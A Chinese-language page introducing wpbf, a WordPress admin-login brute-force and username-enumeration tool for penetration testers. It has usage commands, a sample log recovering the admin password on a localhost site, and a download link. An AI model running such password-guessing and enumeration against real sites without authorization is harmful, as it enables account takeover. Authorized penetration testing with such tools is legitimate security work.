WordPress系统暴力破解测试工具 – wpbf
wpbf这款工具可以帮助渗透测试人员,针对WordPress博客后台进行爆破测试。
特性
- 用户名枚举和发现 多线程 自动使用博客内容中的关键字作为字典 HTTP代理支持 基本的Wordpress指纹探测 高级指纹探测插件
基本使用方法
$ ./wpbf.py http://localhost/wordpress/2012-02-26 14:26:18,793 - INFO - Target URL: http://localhost/wordpress/2012-02-26 14:26:18,844 - INFO - Checking URL and username...2012-02-26 14:26:18,845 - INFO - Enumerating users...2012-02-26 14:26:52,027 - INFO - Usernames: admin, test, guest2012-02-26 14:26:54,153 - INFO - 31 plugins will be tested2012-02-26 14:26:55,311 - INFO - 215 passwords will be tested2012-02-26 14:26:55,369 - INFO - Starting workers...2012-02-26 14:26:56,685 - INFO - WordPress version: 3.0.12012-02-26 14:26:57,570 - INFO - WordPress path in server: /var/www/wordpress/2012-02-26 14:27:08,624 - INFO - Plugin 'akismet' was found2012-02-26 14:27:10,292 - INFO - Plugin 'akismet' version: 2.5.5 (more info @ http://localhost/wordpress/wp-content/plugins/akismet/readme.txt)221 tasks left / 2.1 tasks per second / 1.76min left199 tasks left / 2.2 tasks per second / 1.51min left172 tasks left / 2.7 tasks per second / 1.06min left21 tasks left / 1.6 tasks per second / 0.22min left2012-02-26 14:57:23,245 - INFO - Password 'qawsed' found for username 'admin' on http://localhost/wordpress/wp-login.php
用户名枚举
$ ./wpbf.py -eu http://www.mysite.com/blog/
下载地址
https://github.com/atarantini/wpbf
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- django-模板之comment标签(六)
- 【猫狗数据集】对一张张图像进行预测(而不是测试集)
- 【猫狗数据集】pytorch训练猫狗数据集之创建数据集
- 【猫狗数据集】可视化resnet18的输出
- springmvc实例之修改雇员相关信息(四)
- 基于TypeScript封装Axios笔记(六)
- 蓝桥杯 k好数 java版
- 强烈推介的几个微信小程序开发小技巧,简单又实用
- 【pytorch-ssd目标检测】验证自己创建的数据集
- django-模板之自动转义autoescape(八)
- 【pytorch-ssd目标检测】测试自己创建的数据集
- 【pytorch-ssd目标检测】训练自己创建的数据集
- SwiftUI:更高级的 MKMapView
- spring AOP之重用切点表达式
- springmvc之处理模型数据SessionAttributes注解